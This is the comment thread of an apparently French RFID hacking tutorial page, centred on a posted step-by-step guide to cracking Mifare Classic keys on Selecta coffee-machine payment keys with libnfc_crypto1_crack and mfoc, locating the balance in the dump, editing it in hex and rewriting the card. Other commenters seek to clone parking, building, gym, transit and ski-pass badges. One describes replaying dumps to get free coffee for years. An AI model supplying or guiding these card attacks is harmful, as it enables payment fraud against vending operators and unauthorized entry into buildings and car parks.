sinon si tu es d’accord comprenne contacte sur skype ou autre stp ?
mon bute c’est de faire mon badge et si sa marche de faire un tuto
merci d’avance
Oui c’est ça,
nfc-mfultralight r Dump.mfd pour lire
nfc-mfultralight w Dump.mfd pour écrire
Pour modifier les données, il te faut un éditeur hexadécimal.
Mais saches que très souvent les Ultralight ne servent que pour l’authentification. Il est fort probable que le montant soit contenu dans un serveur local et non sur le badge.
Le seul moyen de vérifier ça c’est de faire un premier dump, puis tu utilises ton badge pour que le montant soit modifié et pour finir tu fais de nouveau un dump.
Ensuite il ne te reste plus qu’à comparer tes 2 dumps et voir si il a des changements.
bonjour, Alpha donc je revient vers toi pour te dire la suite du dump
le dump a bien marcher du coup j’ourvre le fichier mfd sur https://hex-works.com/eng et meme sur wireshark il m’affiche que 4 lignes
0000 00 00 00 00 00 00 00 00 00 00 00 00 e2 10 7e 00 …………â.~.
0010 03 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 ..þ………….
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
donc la franchement je comprend rien meme le uid n’ai pas afficher
please j’ai besoin d’aime merci d’avance
Bonjour mr massa,
C’est curieux, essaie de l’ouvrir avec hexedit sous Linux.
Lorsque tu as créé le dump, tu n’as pas eu de message d’erreur ? Combien de secteurs ont été lus ?
ok je vais essayer de trouver comment l’installer (je galère un peux a installer des logiciel sur linux)
je vient quand de regarder sous windows et j’ai pareil les même lignes
non pas d’erreur il me dit (done 16 block sur 16)
tu mas dit aussi pour la protection de type 3DES qui été pas active part défaut
je doit faire un truc pour sa ou pas ?
je te remercie quand même beaucoup de prendre le temps de chercher avec moi
Si tu as un téléphone sous Android, tu peux télécharger mifare++ultralight, c’est parfait pout lire et éditer ce type de carte. Concernant la protection 3DES,il me semble que tu aurais eu un message lors de la création du dump(je dis bien il me semble car ça fait un moment que je n’ai pas pratiqué).
Pour voir si le problème vient de là, il faudrait reprendre le datasheet de l’ultralight, ça pourrait t’apporter des précisions(faut pas être fâché avec l’anglais 🙂
Lorsque tu as fais ton dump, tu as pu voir tous les octets lus dont l’uid ?
oui j’ai tester plusieurs app et celui la justement me marque 3 ligne avec des 0 après pour la 4eme et 5eme ligne j’ai ça 2E107E000300FE00 après j’ai que des 0 aussi il m’affiche 232 ligne
je voudrez bien te montré mais je peux pas mettre de photo en com
sa me dérange pas de lire la notice du badge mais après je fait quoi avec sa justement c’est sa mon problème je sais pas quoi faire avec c’est donner quel ligne je tape dans le terminal ou même quel logiciel utiliser etc je trouve zéro tuto sur le net ou même quelque piste pour me guider
alors sur le terminal je voie mon uid mais pas dans le dump comme ta pu voir
avec il me parle des block 16 sur 16 ok c’est tout
a aussi j’ai essayer d’écrire sur mon badge pour voir si ça marcher et sa fonctionne toujours 16 sur 16 ok
après je me dit si je peux pas modifier les donner je peux écrire sur le badge a chaque fois
j’ai fait un dump quand il avais 0.75cts et la le dernier il a 0.05cts sa peux surement marcher comme sa au plus simple quand pense tu vue qu’il me dit 16 block sur 16 ok cela pourrai fonctionner ??
Tout d’abord, je reviens sur ce que j’ai dis concernant la protection 3DES, si tu as 16 secteurs, il s’agit d’une Ultralight et non d’une Ultralight C comme je le pensais au début, donc pas de sécurité 3DES.
D’après ce que tu me dis, il y a un problème avec ton dump de sortie. Étant donné que l’ultralight n’a que 64 octets, pourquoi ne pas les écrire manuellement dans un éditeur hexa ou simplement sur une feuille. C’est un peu laborieux mais pas énorme non plus.
Le but pour toi pour l’instant est de comparer les données pour voir si il y a une différence en fonction du montant
ha d’accord parfait alors
surement je sais pas après je les vois pas les lignes mais il me dit que c’est ok 16 sur 16 donc je suppose que c’est bon non ?
heu ok sa me dérange pas mais vue que je voie pas les ligne j’écris quoi justement ou je vais chercher toute c’est info ?
j’ai déjà regarder entre les deux et il y a aucune différence justement vue que j’ai que 4 ligne
Oui si dans le terminal tu as 16 sur 16, c’est bon, maintenant si tu ne vois que 4 lignes puis que des zéro, c’est qu’il n’y a que ça, et que ta carte ne sert qu’à t’identifier auprès du serveur qui lui contient le montant. Comme je te l’ai dit tout au début, c’est souvent le cas avec les Ultralight. Aujourd’hui on voit ce genre de carte un peu partout pour gérer de l’argent, (des bars ou restaurants connectés, machine à café ou encore pour le faire le tiercé etc.. mais l’argent est toujours stockée sur un serveur interne.
Bonsoir bonsoir,
Et si nous étions sur une généralité de nouveau compteur a distance ! des compte relier via wifi a des serveurs ?!
Des serveurs qui gèrent justement l’argent de tel ou tel compte.
Pourvue qu’ça dure !
merci du partage
Bonjour à tous !
Je possède un badge d’accès à un garage et je voudrais en faire une copie.
Mon badge n’est pas détecté par le boitier ACR122U. J’ai essayé avec d’autre type de badge eux le son bien. Savez vous pourquoi ? Le lecteur NFC fonctionne correctement car j’ai pu faire d’autre double. J’ai aussi utilisé l’application NFC Tools avec mon téléphone Android, la aussi impossible de détecter le badge.
Je pense que le badge utilise une autre technologie que le NFC ou une autre fréquence. Comment connaitre la technologie du badge ?
Merci pour votre réponse !
Sisne
Bonjour Sisne,
Oui tu as certainement raison. Si ton lecteur ne reconnaît pas ton badge, c’est qu’il utilise une autre fréquence. Si il n’y a aucune marque de fabricant ou autre qui te permette d’identifier ton badge, ça risque d’être difficile.
A ma connaissance, seul le proxmark pourrait être capable de lire ton badge et de l’identifier.
Cordialement.
Bonjour Alpha, merci pour ta réponse. Connait tu un tuto qui explique comment cloné un badge basse fréquence avec ce type de lecteur ? Vu le prix qu’il coute (100€ sur Amazon) j’ai pas envie de rater…
Merci d’avance pour ton aide
Sisne
Bonjour Sisne,
Non je ne connais pas un tuto en particulier pour ça, le sujet est vaste…
Une personne incontournable dans le domaine, c’est Iceman.
En faisant quelques recherches sur internet, tu trouveras sûrement ta réponse mais saches que le proxmark n’est pas un outil pour monsieur tout le monde, si tu n’es pas un minimum passionné par le rfid, ça risque vite d’être prise de tête. Si tu as l’intention de faire une seule copie, l’investissement ne sera pas rentable… Comme tu dis, il ne faut pas se rater, d’autant que le proxmark à 100 euros n’est qu’une copie chinoise, le vrai coûte plus du double, voir le triple pour la dernière version. Les copies fonctionnent peut être très bien… Peut être pas, je ne sais pas.
Bonsoir tout le monde.
Alors voilà, impossible de trouver les clés A et B de mon badge, voici le message affiché:
Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
Quoi qu’il faut que je fasse du coup :D.
Merci d’avance!!!
bonjour a tous et merci pour toutes ces infos j aimerais savoir si quelqu un peut partager le dossier milazycracker commplet car pour la compilation le programme a besoin de Crapto1 et CraptEV1 et lorque qu on lance les commandes make get on a une reeur 404 ce qui signifi que les lien sont mort donc un impossible de compiler sans ces 2 fichiers quelqu un peux m aidez en partagent le partageant svp
et j ai 4 dumps selecta a partager en echange et un tuto qui pourrais aider pas mal de personne qui vise a casse la securite crypto1 directement
TUTORIEL NFC
je vous rappel que vous etes les seul responsable ce tuto a pour but de montrer les failles nfc en aucun cas je ne serais tenu responsable de vos actes/
Let’s Go 😉
etape1 : Ce qu’il vous faut :
– un lecteur nfc de type ACR122 ( http://amzn.to/2xxrRgv )
– une clé USB
– une clé nfc selecta 😉
Etape 2 : ouvrir le terminal et taper nfc-list
Si le lecteur nfc n’est pas reconnu (vous avez pris le choix 2) :
Il faut modifier le fichier /etc/nfc/libnfc.conf :
A la fin du fichier, decommenté (retirer) les # des lignes :
device.name = « microBuilder.eu »
device.connstring = « pn532_uart:/dev/ttyUSB0 »
Etape 3 : installer crytpo1_bs
Toujours dans le terminal, taper les lignes suivantes :
git clone https://github.com/jiraky90/crypto1_bs
cd crypto1_bs
make get_craptev1(le lien est mort donc si quelqun a CraptEV1 / Crapto1 merci de me les envoyer a IcoderX@protonmail.ch)
make get_crapto1(le lien est mort donc si quelqun CraptEV1 / Crapto1 a merci de me les envoyer a IcoderX@protonmail.ch)
make
sudo cp -a libnfc_crypto1_crack /usr/local/bin
Etape 4 : cracker les clés non standard / clés selecta (cela peut prendre plusieurs heures).
(RAPPEL)Dans le cas ou le pc se met en veille, le mot de passe de cette distribution linux est toor pour ceux avec kali live.
Poser la clé sur lecteur nfc (bien posé pour pas qu’il bouge), toujours dans le terminal :
– Ecrire : libnfc_crypto1_crack a0a1a2a3a4a5 4 A 4 B
– Copier quelque part le résultat (found key : 0123456789AB )
– refaire la même chose pour cracker un autre secteur : libnfc_crypto1_crack a0a1a2a3a4a5 8 A 8 B
– Copier quelque part le résultat (found key : 123456789ABA )
– refaire la même chose pour cracker un 3e secteur : libnfc_crypto1_crack a0a1a2a3a4a5 12 A 12 B
– Copier quelque part le résultat (found key : 23456789AB01 )
Etape 5 : Grâce aux 3 clés obtenus (qui ne changent jamais pour la même clé a café), faire un dump
Il faut bien noter le solde de sa clé Selecta, et ensuite toujours dans le terminal, taper :
mfoc -k cle1 -k cle2 -k cle3 -O dump_solde1.mfd
Sauvegarder le fichier dump_solde1.mfd. car dans le live cd linux, il sera supprimé au redémarrage donc faite attention.
Recharger ou dépenser de l’argent du badge selecta, et refaire un nouveau dump :
mfoc -k cle1 -k cle2 -k cle3 -O dump_solde2.mfd
Sauvegarder ce fichier dump_solde2.mfd. dans le live cd linux, il sera supprimé au redémarrage.
Etape 6 : Comparer les fichiers en faisant dump_solde1.mfd et dump_solde2.mfd
Sous windows, utiliser par exemple HxD et sous linux hexedit que l ‘on peut installer facilement : apt-get install hexedit
Pour MES badges , c’est la ligne ou c’est écrit offset 60 qui a ete modifier(changée), le solde du badge est écrit en hexadecimal :
00000060 00 08 02 01 11 E8 00 01 00 00 00 00 00 00 00 00
Si c’est écrit 802 cela correspond à un solde de 20.50€.(faire la convertion)
Je modifie donc le fichier pour mettre le solde que je veux, je l’enregistre dump_solde3.mfd
Etape 7 : ré-écriture de la clé
On retourne dans le terminal et on réécrit le badge avec le fichier modifier :
nfc-mfclassic W B dump_solde3.mfd dump_solde3.mfd
IMPORTANT
– j ai utiliser libnfc_crypto1_crack, car je n’arrivais pas a faire un dump de clé uniquement avec mfoc
-crypto_bs a BESOIN DE DEUX FICHIERS POUR ETRE COMPILER CraptEV1 / Crapto1 malheuresement je ne l ai ai plus j ai cramer mon disque dur externe et Bra’s (le propriètaire)ne réponds plus pour les envoyer de nouveau donc si quelqun a réussi a les avoir avant que les commandes(lien) make get_craptev1 et make get_crapto1 soient mortes MERCI DE ME LES ENVOYER ET DE LES PARTAGER.
C’est un tuto exclusif que je partage donc faisait en bon usage.Je suis à peu près sur que cela fonctionne sur n’importe quelle clé a café (badge a café nfc).
01 mai 2019
ME CONTACTER IcoderX@protonmail.ch
Merci beaucoup pour ce tuto!!!
Une question me vient: ton tuto fonctionne t’il sans CraptEv1 et Crapto1?
Ma novicitude n’a d’égale que ma curiosité 😀
Bonjour,
Voici un lien pour les deux fichiers que tu mentionnes :
http://www2.vaneay.fr/mifare/
Hello,
J’ai un abonnement à la salle de sport que je paye 30€ par mois avec un accès par carte.
Si j’ai le malheur d’oublier ma carte je suis obligé d’en refaire une pour 25€…
Je souhaiterais en faire une copie, est ce que ca marcherais ?
Bonjour Tbs,
Oui, en théorie, ça devrait fonctionner. Mais avant toutes choses, il faut définir le type de carte qui est utilisée. Le tuto de ce site n’est valable que pour la mifare classic. La carte de ton abonnement pourrait être un autre modèle, comme ultralight, EV1, etc…
Bonjour,
je viens de comparer 2 fichiers avec un montant différent (même badge) et je trouve plusieurs écarts
Comment faire pour savoir ou modifier le montant sachant que sur l’un des 2 je ne retrouve pas le montant en hexa
Fichier (110 = hexa 6E)
9ad4 a594 7bfb d2b0 f981 b33c 3fe7 694c
6701 9d61 386f c503 3d32 9544 ccec fa1d
4aee 04e3 32d8 dd4e 9ad4 a594 7bfb d2b0
a0a1 a2a3 a4a5 0f00 ffff 415a 5445 4b4d
76c0 f06c 2bf0 4bd9 69bd c54f 8de4 b9a2
9ad4 a594 7bfb d2b0 e917 a269 7f80 bfe5
7230 6093 5671 a28f 9ad4 a594 7bfb d2b0
Fichier (120 = Hexa 78)
9ad4 a594 7bfb d2b0 f981 b33c 3fe7 694c
2416 caed 31ee cf92 78bc ddae 83f4 a64c
84e8 1009 3924 680e 9ad4 a594 7bfb d2b0
a0a1 a2a3 a4a5 0f00 ffff 415a 5445 4b4d
76c0 f06c 2bf0 4bd9 616c 72a4 99f7 b377
9ad4 a594 7bfb d2b0 1521 3844 f960 6308
7230 6093 5671 a28f 9ad4 a594 7bfb d2b0
Merci d’avance
Cdt
J’ai exactement le même problème !
J’ai dumper la carte avec 4,10 € puis après achat d’une boisson, reste 2,80€. ci dessous les diff entre les deux dumps :
Si vous trouvez où est la somme, bravo ! Je pense qu’il y a du chiffrage des sommes désormais …
Avant (4,10€) :
b17a fba6 0342 fe8a d525 60a5 db2a 99e9
ecc9 c300 f9fb 6dc2 5a35 fdc5 8c20 1b5f
a0a1 a2a3 a4a5 0f00 ffff 415a 5445 4b4d
0dde 0383 c316 fd0c 9215 c49b f692 e9c1
5a35 fdc5 8c20 1b5f 839c 19b8 16e3 20c8
Après (2,80 €) :
70e7 0bd5 6d95 bd56 eef7 2b4b 3d86 d273
748d 3b50 6040 9897 5a35 fdc5 8c20 1b5f
a0a1 a2a3 a4a5 0f00 ffff 415a 5445 4b4d
0dde 0383 c316 fd0c c537 ef26 5d56 8ded
5a35 fdc5 8c20 1b5f 405a 85de 303e a7cb
idem, j’arrive à la même conclusion ??
si quelqu’un à une solution ?
Salut je voudrais savoir comment et avec quoi je peux cloner un badge qui utilise le 125khz ??et avec quoi je peux obtenir après lecture un dump histoire de la modifier si besoin via un lecteur hexadécimal ?
Avec le proxmark3 ori peut-il vraiment lire et écrire toutes les cartes ? Haute et basse fréquence ?
Merci
Salut tout le monde!
J’ai un badge qui n’est pas lu pas mon acr122. C’est comme si il n’y avait rien sur l’appareil (cela fonctionne correctement avec mes autres badges).
Du coup, pensez vois que ce soit ce dont j’ai peur, c’est à dire du 125khz?
Et si oui, pour faire un dump de ces badges, si je me procure un proxmark3, faut il des badges vierges spécifiquement 125khz?
Merci d’avance 🙂
Bonjour a chaque fois au moment de réécrire sur la clé le message failure to write to data block 4 s affiche d ou cela bien il ?
Block 50, type B, key 415a54454b4d :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type B, key 415a54454b4d :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type B, key 415a54454b4d :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff ff 00 00 00 00 00 00
Block 46, type B, key 415a54454b4d :5d 56 33 45 5e f7 ef f8 e3 ae 02 da ec ae 1b ae
Block 45, type B, key 415a54454b4d :42 4e 12 e8 c1 b5 be 67 87 c3 9a a1 97 99 2c d5
Block 44, type B, key 415a54454b4d :d7 6a 66 ae 0d 94 17 98 d2 c4 ba 30 e5 24 b1 52
Block 43, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff ff 00 00 00 00 00 00
Block 42, type B, key 415a54454b4d :b6 bd fe 82 0e 2d 15 91 c3 91 c1 83 fe a0 b2 3e
Block 41, type B, key 415a54454b4d :8b 13 cd 4b 77 2a 37 cd 98 9b b3 13 cb 5e cc db
Block 40, type B, key 415a54454b4d :42 4e 12 e8 c1 b5 be 67 b3 e9 18 68 31 5f 44 04
Block 39, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff ff 00 00 00 00 00 00
Block 38, type B, key 415a54454b4d :d7 6a 66 ae 0d 94 17 98 d2 c4 ba 30 e5 24 b1 52
Block 37, type B, key 415a54454b4d :b6 bd fe 82 0e 2d 15 91 c3 91 c1 83 fe a0 b2 3e
Block 36, type B, key 415a54454b4d :9c ed 26 49 eb 33 07 68 0a b3 8e 10 30 92 ec 2c
Block 35, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff ff 00 00 00 00 00 00
Block 34, type B, key 415a54454b4d :d6 70 8a 6a 5b 89 bc d7 e8 c6 a4 18 6a 0b a2 97
Block 33, type B, key 415a54454b4d :56 96 78 e1 3c 15 f0 97 c5 79 3d dd d0 99 77 32
….
quand je fais un clone du badge d’origine sur un badge avec UID modifiable, l’UID et tous les block type A sont clonés…. SAUF les block Type B qui n’apparaissent pas dans la nouvelle clé !
Bonjour,
j’ai réussi a créer un clone de ma carte mfare par le bias de la méthode citer ci dessus.
Les deux carte fonctionne.
Par contre Je constate que le SAK de la carte clone est désormais 88 au lieu de 08 comme il était au début, et comme il est sur l’original.
1) Y’aurait il une façon de corriger ce problème afin d’avoir une carte clone a 100 pour-cent?
2) es ce que cette carte va être reconnu par le système comme une copie a cause de cela?
Objectif: Ayant droit a une place de parking accessible avec cette carte et utilisant des véhicules différents, j’aimerais avoir deux carte fonctionnelles afin d’en laisser une dans chaque voiture.
En vous remerciant par avance pour vos réponses.
Bonjour,
Ma question est de savoir si on peut cloner un abonnement pour transport en communs?
Hello à tous,
Je commence par le début, et pour copier une carte je saisie la commande
mfoc -P 500 -O carte-a-copier.dmp
J’ai ensuite un message d’erreur qui dit: bash: mfoc: command not found
pouvez-vous m’aiguiller?
Merci
Tu n’a pas mfoc d’installer c’est pour sa installe le package
Bonjour à tous , quelqu un s est il déjà attaqué au forfait de ski ?
Bonjour;
Je suis assez novice et je compte bien répliquer un badge d’accès. Celui ci semble être de type uhf puisque qu’il fonctionne à une distance de 3 mètres.
Comment peut-on déterminer la fréquence du badge afin de se fournir le vin lecteur copieur?
Dans le cas d’un type uhf est-ce que ce sera la même procédure avec uid bloc0 modifiable? Ou trouver des carte modifiable?
Merci d’avance.
J’ai le même message avec la distrib Kali : kali-linux-2020-W09-live-amd64.iso
Si quelqu’un peut m’aider à résoudre ce probleme…
Merci 🙂
bonjour, je cherche a copier ma carte de parking.
est ce qu’une personne pourrait me faire une copie moyennant finance.
merci par avance.
Bonjour possible de modifier le montant d’une clé eurokey ? Merci
Salut Salut!
Est ce que quelqu’un pourrait m’expliquer comment monter miLazyCracker avec les deux fichiers manquants qu’il me semble avoir trouvés???
Merci d’avance!!
Bonjour,
Rien à avoir avec le fait de jouer sur la faille des badges RFID, mais j’ai un distributeur pour chat avec detection de la puce de celui-ci grâce à une antenne (ou éventuellement un médaillon) installé sur le distributeur.
Cependant, j’ai pas envie de faire porter le médaillon (qui dit collier dit allergie) à mon chat et or cette marque de distributeur ne garantit finalement pas la detection de la puce du chat… un peu embêtant vu le prix.
Sauriez-vous m’indiquer comment je pourrais faire en sorte de forcer la détection de la puce ?
Merci ! 🙂
Bonjour, est il possible de cloner un clone ?
Une carte chinoise clone d’une mifare.
Car quand j’essaye de Dumper ça tourne en boucle
j ai le meme soucis
Bonjour,
Est-il possible que les personnes responsable des machines se rende compte de la supercherie?
Merci.
« allez à la ligne à modifier (ligne 51 dans mon cas) et modifiez le montant en hexadécimal »
Question bete mais comment le modifier, il faut l’éditer avec quoi?
bonjour
existe t il une commande linux pour donner la generation d’un badge mifare ?
Bonsoir,
Super tuto.
J’ai pu dupliquer mon badge Vigik (Urmet). Tout a bien fonctionné, copie parfaite. Mais le porte reste fermée. Aucune trace de compteur de passages sur le badge original qui expliquerait le blocage de la copie.
Une idée ?
Merci pour ce super tuto.
par contre je n’arrive pas a télécharger kali Linux ( la bonne version) car le lien est mort.
Pouvez-vous m’envoyer le lien pour le télécharger car j’ai essayer plusieurs version de Kali et c’a marche pas.
Merci merci merci
Salut,
Est t il possible de ce faire repérer avec l uid d’une clé u key ? Si l on ne modifie que le montant stocker ? Peux on le modifier pour + de ne pas ce faire réperer, sur une clée vierge
Bonjour
Je vois souvent des personnes qui demande une solution concernant Card is not vulnerable to nested attack
Mais pas de réponse….une solution a été trouvée depuis ??
Merci.
bonjour,
Je vois que vous chercher midi à quatorze heures.
il y a plus simple juste avec un téléphone ca dure que 2m18 de manip, et ou sa a vie.
bonjour , j’ai deux dump avec montant diffrente mais je ne sais pas ou trouver la bonne ligne
merci
Bonjour anonynekbz,
tu peux m’en dire plus? Je viens de perdre mes clefs avec mon bip et j’en ai emprunté un pour rentrer dans mon immeuble. En MP peut être?
Bonjour,
Bravo et merci pour cet article, super ! 🙂
J’ai une question concernant la carte. Si je ne veux pas en acheter une vierge à cloner, pourquoi ne pas simplement conserver le dump et une fois la carte vidée, le réutiliser en réécrivant par dessus. Puisqu’il est possible de le faire en un rien de temps via son téléphone, cela evite les manipulations de code et permet de « recharger » sa carte en la duplicant, toujours la même, à l’infini, non ?
Si vous me dîtes qu’il est impossible de réécrire à 100% ( hormis l’IUD et encore mais la il s’agit de la même carte ) exactement alors je comprendrais que ma question n’a aucun sens. Merci d’avance. 🙂
Bonjour,
Je suis totalement novice. J’ai perdu mon badge de parking du travail. Je n’ai plus le droit d’en obtenir un nouveau… je souhaite faire un duplicata du badge d’une collègue. J’ai un MacBook Air, puis utiliser linux sur mon MacBook ? j’ai également téléchargé NFC Tools, ça lit biens mes cartes mais je ne suis pas certaine que ça pourra copier la carte souhaitée et la graver sur la carte vierge….
Quelqu’un pourrait m’aider de grâce ? je vous remercie infiniment
Bonjour,
Il faudrait déjà que tu saches de quelle modèle de carte il s’agit ?
Avec nfc tools, tu dois pouvoir avoir cette info.
Ex: mifare classic, mifare ultralight…
Bonjour j’ai suivie le tuto à la lettre mes lorsque que je passe mon badge sur la machine à café rien ne ce passe même pas une erreur je ne comprend pas
Petite info, vous pouvez réaliser la même astuce avec le badges à café pour modifier la puce des cartouche d’imprimante pour imprimer quelques page de plus avec l’encre soi-disant fini.
C’est moralement beaucoup plus sympa : cela évite le gaspillage
bonjour,
je suis débutante je voulais copier mon badge de mon immeuble, j’utilise mon tel avec l’application MCT ( mifare classic tool) je copie mon badge ok puis viens pour l’écrire sur un nvx badge que j’ai acheté sur aliexpress
j’ai ce msg d’erreur: some error occurred while writing ( this might be bad)
ça vient de mess badges vierges ????
Bonjour, merci pour ce tuto.
Existe-t-il une commande pour formatter un badge (low level format) dans lequel il manque des keys?
Genre refaire un badge vierge avec des FF et des 00 partout.
Bonjour
je voudrais faire la meme chose mais avec un badge lavage auto qui est en 13.56mhz avec un mifare crypté donc je pence que uid est non modifiable c’est quand meme possible de faire votre manip ?mon badge est un EuroKey Next
Bonjour
quand tu dit lire la clé puis changer le montant et la relire puis utilisé sublimtext si la clé est crypté on auras pas acces au valeur deciaml donc on ne pourras pas changer la valeur du montant
Salut, merci pour le tut ! Ça veut dire que si j’ai un forfait de ski, il a un numéro d’attribué, donc si je clone ce forfait et que je le recharge officiellement, tous mes clones fonctionneront au même titre que celui que j’ai officiellement chargé ? Merci
Aurais tu télégram ? voici mon blaz viens me voir mec https://t.me/NorahCIV89
Bien le bonsoir à tous,
Comme tout le monde, je cherche à modifier le montant du badge café…
J’ai réussi à lire/dump l’intégralité de la carte. Oui, j’ai toutes les clés du royaume !!!
J’ai identifier le bloc qui contient le code de la dernière machine utilisée.
J’ai identifié les 2 octets qui contiennent les crédits.
Mais au moment de faire l’update… Rien n’y fait…
J’ai essayer toutes les options possibles de ‘nfc-mfclassic’ et tous les sens des fichiers inputs.
J’ai pourtant eu ces messages :
Writing 64 blocks |……………………………………………………|
Done, 60 of 64 blocks written.
Done, 44 of 64 blocks written.
Mais au moment de relire et vérifier la prise en compte de la modification…
C’est toujours l’original…
Quelqu’un peut-il m’expliquer ce que je fait de mal ?
Bonjour bonsoir
ça fait maintenant 3 ans maintenant que j’ai rechargé ma clé de distributeur de café (10,76€€ pour être précis 😁).
Et depuis je l’utilise à volonté.
Le mode fonctionnement d’une puce RFID, la puce a besoin de lire le montant si ok pour le solde j’ai mon café sinon il vois que je n’ai plus assez.
Qui veux dire lecture du solde —> ok—> j’ai mon café ;—> si NOK—> rechargement nécessaire. = lecture 10,76€ – mon café écriture = 10,26€ et ainsi de suite, jusqu’au moment où je n’ai plus rien.
Au début j’avais cloné ma clé (10,76€).
Des lors mon solde bas (ou même lors d’un seul achat). j’écrivais mon dump de 10,76€ sur ma clé et par magie je retrouvé mon Solde initial.
On peux faire ça sur n’importe quelle badge à partir du moment ou ce n’est pas en réseau. Même le ski d’ailleurs 😁
A l’époque j’avais contacté le fournisseur mais m’a pris pour un moins que rien du coup le quart de mon entreprise bénéfice de cette faille.
J’attends votre retour d’expérience.
A bientôt
Bonjour,
Pouvez_vous me dire la marche à suivre svp?
J’utilise l’application MCT.
merci
cdlt
Bonjour la communauté je suis novice et j’essaye de dupliqué un badge NFC pour machine a café j’ai bien réussi a décrypter le tag mais voilà mon problème la puce fait 17 bloc et je n’arrive pas a trouvé quelle tag il me faut je ne trouve que des 16 bloc quelqu’un aurait une solution merci d’avance 🙂
Bonjour,
J’aimerais savoir si il serais possible d’utiliser une carte vierge pour deux signaux, copier le signal d’un tag d’ouverture de barrière électrique ainsi que le paramétrer sur une serrure intelligente ( je ne sais pas si quand on enregistre le tag sur une serrure connecté, cela écris ou non sur le tag en question).
L’idée serais que le même tag ou carte ouvre la barrière et la porte.
Est ce possible s’il vous plait? merci d’avance pour vos réponses
Bonjour ,je ne comprends pas la dernière partie pour modifier la somme.comment faire pour faire la modification , quelle logiciel utilisé , dans l’attente de votre réponse merci
Bjr je rencontre le même problème je copie ma clé chinoise et ensuite la clé d origine et je copie dans la clé chinoise je comprends pas comment sa fonctionne pour faire une copie il faut des donner de la clé d original à la clé chinoise comment le logiciel peut faire la. Différence entre copie chinoise et copie original et comment il fait pour dire bon je copie l original sur la chinoise lol
Salit à tu réussi la copie de ta carte moi sa fonctionne pas merci
Slt peut tu me dire si tu a les deux même uid sur ta copie chinoise que sur ta clé original merci
bjr a tu un retour pour ta question moi rien
Bonjour, j’ai un badge d’accès pour les barrière d’un port plaisance, nombre d’accès limité à 10 fois
Je voudrai copié ce badge ou meme le recharger, une solution possible ? Merci d’avance
Bonjour la commu de bidouilleurs,
Serait-il possible de recevoir par mail les deux fichiers CraptEv1 et Crapto1 ?
Je vais avoir une nouvelle clé à café et j’aimerais tenté de modifier le solde comme tous le monde.
Je ne connais pas encore le modèle précis de clé mais j’anticipe juste car j’ai l’impression que ces deux fichiers me seront bien utiles.
J’ai essayé de t’écrire IcoderX mais ton mail ne semble pas fonctionner.
Bonne journée à toutes et tous.
Merci de votre commentaire. Ce guide est un excellent point de départ pour comprendre la technologie RFID et ses faiblesses de sécurité. Il fournit des instructions claires, mais il est cependant important de noter que ce type de procédure peut être illégal et doit être utilisée de mani\u00e8re éthique et soucieuse des lois. Il est crucial de respecter les droits de propri\u00e9t\u00e9 et de ne pas enfreindre les lois sur la propri\u00e9t\u00e9 intellectuelle. Si vous avez des questions ou des inquiétudes, il est judicieux de rechercher des informations suppl\u00e9mentaires pour vous assurer de bien comprendre les conséquences et les implications juridiques avant de tenter toute action.
Bonjour,
J’ai cette appareil, peut on faire la même chose que dans votre tuto ?
https://www.rubinlacaque.fr/ProductCard/BTIBT348408/programmateur-port-usb-hf
Merci
Bonne journée.
Quand je fait la lecture de ma clé original je retrouve pas la ligne du montant 2.88 donc 120 j’ai fait ligne par ligne très long mes. Rien avez vous déjà u ce problème merci
Bonjour tous le monde
Changement de machine à café donc changement de carte rrrrr
Nouvelle carte : NXP – Mifare DESFire EV2 4k
Est-il possible de faire quelque chose ???
Merci